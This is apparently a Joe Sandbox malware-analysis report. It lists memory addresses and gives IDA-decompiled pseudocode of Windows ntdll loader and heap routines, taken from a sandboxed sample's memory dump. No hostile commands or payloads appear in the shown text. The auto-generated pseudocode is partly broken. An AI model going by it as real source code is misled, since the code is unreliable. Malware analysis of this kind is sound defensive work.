                                                                                                                                                                                            0x33d006b9
                                                                                                                                                                                            0x33d006be
                                                                                                                                                                                            0x33d00921
                                                                                                                                                                                            0x33d006c4
                                                                                                                                                                                            0x33d006c4
                                                                                                                                                                                            0x33d006c4
                                                                                                                                                                                            0x33d006ca
                                                                                                                                                                                            0x33d006d3
                                                                                                                                                                                            0x33d006d9
                                                                                                                                                                                            0x33d006dc
                                                                                                                                                                                            0x33d54f0a
                                                                                                                                                                                            0x33d54f10
                                                                                                                                                                                            0x33d54f13
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d006e2
                                                                                                                                                                                            0x33d006e2
                                                                                                                                                                                            0x33d006f2
                                                                                                                                                                                            0x33d00930
                                                                                                                                                                                            0x33d00936
                                                                                                                                                                                            0x33d00938
                                                                                                                                                                                            0x33d0093e
                                                                                                                                                                                            0x33d0093e
                                                                                                                                                                                            0x33d00938
                                                                                                                                                                                            0x33d006ff
                                                                                                                                                                                            0x33d54f1b
                                                                                                                                                                                            0x33d54f1d
                                                                                                                                                                                            0x33d54f22
                                                                                                                                                                                            0x33d54f29
                                                                                                                                                                                            0x33d54f2a
                                                                                                                                                                                            0x33d54f2c
                                                                                                                                                                                            0x33d54f2d
                                                                                                                                                                                            0x33d54f2f
                                                                                                                                                                                            0x33d54f34
                                                                                                                                                                                            0x33d54f36
                                                                                                                                                                                            0x33d54f39
                                                                                                                                                                                            0x33d54f44
                                                                                                                                                                                            0x33d54f4d
                                                                                                                                                                                            0x33d54f4f
                                                                                                                                                                                            0x33d54f54
                                                                                                                                                                                            0x33d54f5b
                                                                                                                                                                                            0x33d54f5b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d54f5b
                                                                                                                                                                                            0x33d54f3b
                                                                                                                                                                                            0x33d54f3d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d54f3f
                                                                                                                                                                                            0x33d54f42
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d00705
                                                                                                                                                                                            0x33d00705
                                                                                                                                                                                            0x33d0070c
                                                                                                                                                                                            0x33d0070e
                                                                                                                                                                                            0x33d00724
                                                                                                                                                                                            0x33d00727
                                                                                                                                                                                            0x33d0072d
                                                                                                                                                                                            0x33d00730
                                                                                                                                                                                            0x33d00751
                                                                                                                                                                                            0x33d00751
                                                                                                                                                                                            0x33d00757
                                                                                                                                                                                            0x33d0075c
                                                                                                                                                                                            0x33d0075d
                                                                                                                                                                                            0x33d0075f
                                                                                                                                                                                            0x33d00760
                                                                                                                                                                                            0x33d00762
                                                                                                                                                                                            0x33d00767
                                                                                                                                                                                            0x33d0076a
                                                                                                                                                                                            0x33d0076a
                                                                                                                                                                                            0x33d00770
                                                                                                                                                                                            0x33d00772
                                                                                                                                                                                            0x33d54f9f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d54f9f
                                                                                                                                                                                            0x33d0077e
                                                                                                                                                                                            0x33d00783
                                                                                                                                                                                            0x33d54faa
                                                                                                                                                                                            0x33d54fad
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d54fbc
                                                                                                                                                                                            0x33d0078e
                                                                                                                                                                                            0x33d00791
                                                                                                                                                                                            0x33d54fcc
                                                                                                                                                                                            0x33d54fd3
                                                                                                                                                                                            0x33d54fe2
                                                                                                                                                                                            0x33d54fe2
                                                                                                                                                                                            0x33d54fd3
                                                                                                                                                                                            0x33d0079b
                                                                                                                                                                                            0x33d007a0
                                                                                                                                                                                            0x33d007a4
                                                                                                                                                                                            0x33d007b0
                                                                                                                                                                                            0x33d007b7
                                                                                                                                                                                            0x33d54fec
                                                                                                                                                                                            0x33d54ff1
                                                                                                                                                                                            0x33d54ff1
                                                                                                                                                                                            0x33d007b7
                                                                                                                                                                                            0x33d007bd
                                                                                                                                                                                            0x33d007c1
                                                                                                                                                                                            0x33d007c5
                                                                                                                                                                                            0x33d007c8
                                                                                                                                                                                            0x33d007cb
                                                                                                                                                                                            0x33d007d0
                                                                                                                                                                                            0x33d007d3
                                                                                                                                                                                            0x33d007d3
                                                                                                                                                                                            0x33d007d6
                                                                                                                                                                                            0x33d55008
                                                                                                                                                                                            0x33d007e4
                                                                                                                                                                                            0x33d007e4
                                                                                                                                                                                            0x33d007e6
                                                                                                                                                                                            0x33d007e6
                                                                                                                                                                                            0x33d007e9
                                                                                                                                                                                            0x33d007ee
                                                                                                                                                                                            0x33d0081b
                                                                                                                                                                                            0x33d0081b
                                                                                                                                                                                            0x33d0081e
                                                                                                                                                                                            0x33d00827
                                                                                                                                                                                            0x33d0082d
                                                                                                                                                                                            0x33d00833
                                                                                                                                                                                            0x33d00839
                                                                                                                                                                                            0x33d0083f
                                                                                                                                                                                            0x33d00848
                                                                                                                                                                                            0x33d008fd
                                                                                                                                                                                            0x33d00903
                                                                                                                                                                                            0x33d00903
                                                                                                                                                                                            0x33d0084e
                                                                                                                                                                                            0x33d00851
                                                                                                                                                                                            0x33d00855
                                                                                                                                                                                            0x33d00945
                                                                                                                                                                                            0x33d0094d
                                                                                                                                                                                            0x33d00950
                                                                                                                                                                                            0x33d00953
                                                                                                                                                                                            0x33d00964
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d00964
                                                                                                                                                                                            0x33d00955
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0085b
                                                                                                                                                                                            0x33d0085b
                                                                                                                                                                                            0x33d0086e
                                                                                                                                                                                            0x33d00876
                                                                                                                                                                                            0x33d00879
                                                                                                                                                                                            0x33d00879
                                                                                                                                                                                            0x33d0087c
                                                                                                                                                                                            0x33d00880
                                                                                                                                                                                            0x33d00885
                                                                                                                                                                                            0x33d008dd
                                                                                                                                                                                            0x33d008de
                                                                                                                                                                                            0x33d008e1
                                                                                                                                                                                            0x33d008e6
                                                                                                                                                                                            0x33d008f3
                                                                                                                                                                                            0x33d008f8
                                                                                                                                                                                            0x33d008f8
                                                                                                                                                                                            0x33d00887
                                                                                                                                                                                            0x33d00887
                                                                                                                                                                                            0x33d00887
                                                                                                                                                                                            0x33d00889
                                                                                                                                                                                            0x33d00892
                                                                                                                                                                                            0x33d00897
                                                                                                                                                                                            0x33d5505d
                                                                                                                                                                                            0x33d55060
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5506f
                                                                                                                                                                                            0x33d008a2
                                                                                                                                                                                            0x33d008a5
                                                                                                                                                                                            0x33d55079
                                                                                                                                                                                            0x33d5507f
                                                                                                                                                                                            0x33d55086
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d55091
                                                                                                                                                                                            0x33d55093
                                                                                                                                                                                            0x33d550a5
                                                                                                                                                                                            0x33d55095
                                                                                                                                                                                            0x33d5509e
                                                                                                                                                                                            0x33d5509e
                                                                                                                                                                                            0x33d550af
                                                                                                                                                                                            0x33d550be
                                                                                                                                                                                            0x33d008ae
                                                                                                                                                                                            0x33d008b4
                                                                                                                                                                                            0x33d008b9
                                                                                                                                                                                            0x33d550c8
                                                                                                                                                                                            0x33d550cb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d550da
                                                                                                                                                                                            0x33d008c4
                                                                                                                                                                                            0x33d008c7
                                                                                                                                                                                            0x33d550e9
                                                                                                                                                                                            0x33d550eb
                                                                                                                                                                                            0x33d550fd
                                                                                                                                                                                            0x33d550ed
                                                                                                                                                                                            0x33d550f6
                                                                                                                                                                                            0x33d550f6
                                                                                                                                                                                            0x33d55113
                                                                                                                                                                                            0x33d55113
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d008cd
                                                                                                                                                                                            0x33d008bf
                                                                                                                                                                                            0x33d008bf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d008bf
                                                                                                                                                                                            0x33d008ab
                                                                                                                                                                                            0x33d008ab
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d008ab
                                                                                                                                                                                            0x33d0089d
                                                                                                                                                                                            0x33d0089d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0089d
                                                                                                                                                                                            0x33d007f0
                                                                                                                                                                                            0x33d007f0
                                                                                                                                                                                            0x33d007f8
                                                                                                                                                                                            0x33d55014
                                                                                                                                                                                            0x33d55017
                                                                                                                                                                                            0x33d5501a
                                                                                                                                                                                            0x33d55036
                                                                                                                                                                                            0x33d5503d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5501c
                                                                                                                                                                                            0x33d5501c
                                                                                                                                                                                            0x33d5501c
                                                                                                                                                                                            0x33d5501e
                                                                                                                                                                                            0x33d55020
                                                                                                                                                                                            0x33d55023
                                                                                                                                                                                            0x33d55026
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d55028
                                                                                                                                                                                            0x33d5502b
                                                                                                                                                                                            0x33d5502e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d55030
                                                                                                                                                                                            0x33d55035
                                                                                                                                                                                            0x33d55035
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d55035
                                                                                                                                                                                            0x33d007fe
                                                                                                                                                                                            0x33d007fe
                                                                                                                                                                                            0x33d00801
                                                                                                                                                                                            0x33d00803
                                                                                                                                                                                            0x33d00808
                                                                                                                                                                                            0x33d55053
                                                                                                                                                                                            0x33d00816
                                                                                                                                                                                            0x33d00816
                                                                                                                                                                                            0x33d00818
                                                                                                                                                                                            0x33d00818
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d00808
                                                                                                                                                                                            0x33d007ee
                                                                                                                                                                                            0x33d00789
                                                                                                                                                                                            0x33d00789
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d00789
                                                                                                                                                                                            0x33d00732
                                                                                                                                                                                            0x33d00736
                                                                                                                                                                                            0x33d54f63
                                                                                                                                                                                            0x33d54f66
                                                                                                                                                                                            0x33d54f66
                                                                                                                                                                                            0x33d54f6b
                                                                                                                                                                                            0x33d54f6d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d54f76
                                                                                                                                                                                            0x33d54f79
                                                                                                                                                                                            0x33d54f7b
                                                                                                                                                                                            0x33d54f8d
                                                                                                                                                                                            0x33d54f92
                                                                                                                                                                                            0x33d54f92
                                                                                                                                                                                            0x33d54f95
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d54f95
                                                                                                                                                                                            0x33d0073c
                                                                                                                                                                                            0x33d00742
                                                                                                                                                                                            0x33d0074b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0074b
                                                                                                                                                                                            0x33d006ff

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                                                                            • Opcode ID: 900efdfc2856b5475b78e4d4cb4848165ba005fa86a34873a1eb93442d0f9926
                                                                                                                                                                                            • Instruction ID: 7f944d99dab9b0ea11ed89af7e178e6ea5aa5d87be3d6317fabae6c70ccebd5b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 900efdfc2856b5475b78e4d4cb4848165ba005fa86a34873a1eb93442d0f9926
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF1BD75A00701EFEB05CF68D880B6AB7B6FF44B40F1441A9E4569B781D738E981CF91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D19723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                            			E33D19723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					L33D1A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x33de65f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x33de9214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E33CFFED0(0x33de32d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x776636a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							L33D10C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x33de91e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E33CF98DE(_t87, "true");
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								L33D785AA(_t87);
							}
						}
						__eflags =  *0x33de37c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E33D6E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E33D1A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x33de32d8);
					_t50 = E33CFE740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L33D02330(_t50, 0x33de6668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E33D0D963(_t86, _t86, 0, _t104, _t110, __eflags);
								L33D024D0(0x33de6668);
								__eflags = _v12;
								if(_v12 != 0) {
									E33D19723(_t86, 0);
								}
								_t50 = E33D03BC0( *0x33de5d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E33D19938(L33D02330(_t50, 0x33de6668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L33D19B40(_t85, _t107, _t110, 0x33de67ac);
							_t29 = _t107 + 0x68; // -68
							L33D19B40(_t85, _t107, _t110, 0x33de67a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						L33D024D0(0x33de6668);
						if( *0x33de5d70 != 0) {
							L33D2680F(_t107);
						}
						_t50 = E33D0D3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}








































                                                                                                                                                                                            0x33d19723
                                                                                                                                                                                            0x33d1972b
                                                                                                                                                                                            0x33d19736
                                                                                                                                                                                            0x33d19738
                                                                                                                                                                                            0x33d1973c
                                                                                                                                                                                            0x33d1973e
                                                                                                                                                                                            0x33d19742
                                                                                                                                                                                            0x33d19747
                                                                                                                                                                                            0x33d197bc
                                                                                                                                                                                            0x33d197bc
                                                                                                                                                                                            0x33d197bc
                                                                                                                                                                                            0x33d197bc
                                                                                                                                                                                            0x33d197c0
                                                                                                                                                                                            0x33d197c5
                                                                                                                                                                                            0x33d197c5
                                                                                                                                                                                            0x33d197cb
                                                                                                                                                                                            0x33d19900
                                                                                                                                                                                            0x33d19908
                                                                                                                                                                                            0x33d19913
                                                                                                                                                                                            0x33d19914
                                                                                                                                                                                            0x33d19916
                                                                                                                                                                                            0x33d19918
                                                                                                                                                                                            0x33d19918
                                                                                                                                                                                            0x33d197d6
                                                                                                                                                                                            0x33d197db
                                                                                                                                                                                            0x33d197dd
                                                                                                                                                                                            0x33d197dd
                                                                                                                                                                                            0x33d197e1
                                                                                                                                                                                            0x33d197e3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d197e5
                                                                                                                                                                                            0x33d197e5
                                                                                                                                                                                            0x33d197e8
                                                                                                                                                                                            0x33d197ec
                                                                                                                                                                                            0x33d197ee
                                                                                                                                                                                            0x33d197f1
                                                                                                                                                                                            0x33d197f4
                                                                                                                                                                                            0x33d197f9
                                                                                                                                                                                            0x33d197fb
                                                                                                                                                                                            0x33d19922
                                                                                                                                                                                            0x33d19928
                                                                                                                                                                                            0x33d19928
                                                                                                                                                                                            0x33d19803
                                                                                                                                                                                            0x33d19805
                                                                                                                                                                                            0x33d1980a
                                                                                                                                                                                            0x33d1980e
                                                                                                                                                                                            0x33d19815
                                                                                                                                                                                            0x33d5dade
                                                                                                                                                                                            0x33d5dae0
                                                                                                                                                                                            0x33d5dae0
                                                                                                                                                                                            0x33d19815
                                                                                                                                                                                            0x33d1981b
                                                                                                                                                                                            0x33d19822
                                                                                                                                                                                            0x33d5daea
                                                                                                                                                                                            0x33d5db04
                                                                                                                                                                                            0x33d5db09
                                                                                                                                                                                            0x33d5db09
                                                                                                                                                                                            0x33d19828
                                                                                                                                                                                            0x33d1982a
                                                                                                                                                                                            0x33d1982d
                                                                                                                                                                                            0x33d19836
                                                                                                                                                                                            0x33d19836
                                                                                                                                                                                            0x33d1983a
                                                                                                                                                                                            0x33d1983f
                                                                                                                                                                                            0x33d19755
                                                                                                                                                                                            0x33d19755
                                                                                                                                                                                            0x33d19755
                                                                                                                                                                                            0x33d1975a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1986e
                                                                                                                                                                                            0x33d19870
                                                                                                                                                                                            0x33d19872
                                                                                                                                                                                            0x33d1992f
                                                                                                                                                                                            0x33d19931
                                                                                                                                                                                            0x33d19878
                                                                                                                                                                                            0x33d19878
                                                                                                                                                                                            0x33d19878
                                                                                                                                                                                            0x33d19878
                                                                                                                                                                                            0x33d19878
                                                                                                                                                                                            0x33d1987c
                                                                                                                                                                                            0x33d1987e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d19884
                                                                                                                                                                                            0x33d19889
                                                                                                                                                                                            0x33d1988e
                                                                                                                                                                                            0x33d19891
                                                                                                                                                                                            0x33d19891
                                                                                                                                                                                            0x33d19894
                                                                                                                                                                                            0x33d19897
                                                                                                                                                                                            0x33d19899
                                                                                                                                                                                            0x33d1989d
                                                                                                                                                                                            0x33d1989f
                                                                                                                                                                                            0x33d198b1
                                                                                                                                                                                            0x33d198b3
                                                                                                                                                                                            0x33d198b5
                                                                                                                                                                                            0x33d198b8
                                                                                                                                                                                            0x33d198c0
                                                                                                                                                                                            0x33d198c2
                                                                                                                                                                                            0x33d198c2
                                                                                                                                                                                            0x33d198c4
                                                                                                                                                                                            0x33d198c4
                                                                                                                                                                                            0x33d198cd
                                                                                                                                                                                            0x33d198d0
                                                                                                                                                                                            0x33d198da
                                                                                                                                                                                            0x33d198df
                                                                                                                                                                                            0x33d198e4
                                                                                                                                                                                            0x33d198e8
                                                                                                                                                                                            0x33d198e8
                                                                                                                                                                                            0x33d198f6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d198f6
                                                                                                                                                                                            0x33d198a1
                                                                                                                                                                                            0x33d198a3
                                                                                                                                                                                            0x33d198a3
                                                                                                                                                                                            0x33d198a5
                                                                                                                                                                                            0x33d198a7
                                                                                                                                                                                            0x33d198a9
                                                                                                                                                                                            0x33d198a9
                                                                                                                                                                                            0x33d198ad
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d198ad
                                                                                                                                                                                            0x33d1987e
                                                                                                                                                                                            0x33d19760
                                                                                                                                                                                            0x33d19762
                                                                                                                                                                                            0x33d1976b
                                                                                                                                                                                            0x33d197b5
                                                                                                                                                                                            0x33d197bb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1976d
                                                                                                                                                                                            0x33d1976d
                                                                                                                                                                                            0x33d1976d
                                                                                                                                                                                            0x33d1976f
                                                                                                                                                                                            0x33d19777
                                                                                                                                                                                            0x33d19782
                                                                                                                                                                                            0x33d1978b
                                                                                                                                                                                            0x33d19849
                                                                                                                                                                                            0x33d19852
                                                                                                                                                                                            0x33d19857
                                                                                                                                                                                            0x33d19860
                                                                                                                                                                                            0x33d19865
                                                                                                                                                                                            0x33d19865
                                                                                                                                                                                            0x33d19796
                                                                                                                                                                                            0x33d197a2
                                                                                                                                                                                            0x33d5db13
                                                                                                                                                                                            0x33d5db13
                                                                                                                                                                                            0x33d197aa
                                                                                                                                                                                            0x33d197af
                                                                                                                                                                                            0x33d197b1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1976d
                                                                                                                                                                                            0x33d1974d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d19753
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                            • API String ID: 3446177414-2283098728
                                                                                                                                                                                            • Opcode ID: 14ebb7b5decff05bcd8e7f56625924908caccf42f5a91fbd4edef55f5e6bf730
                                                                                                                                                                                            • Instruction ID: a3c295f249e4e0d585b418e82cb69c409b6f475fc301ffefc381a860f1387595
                                                                                                                                                                                            • Opcode Fuzzy Hash: 14ebb7b5decff05bcd8e7f56625924908caccf42f5a91fbd4edef55f5e6bf730
                                                                                                                                                                                            • Instruction Fuzzy Hash: D0512776E017019FE751EF38E880B1977A5BF84B14F08066DE49397A91DBB0D825CBE1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                            			E33D1510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(L33D18BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(L33D18BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(L33D18BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(L33D18BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(L33D18BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E33D05D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							L33D388C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = L33D3A8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E33D35050(0,  &_v68, _t170);
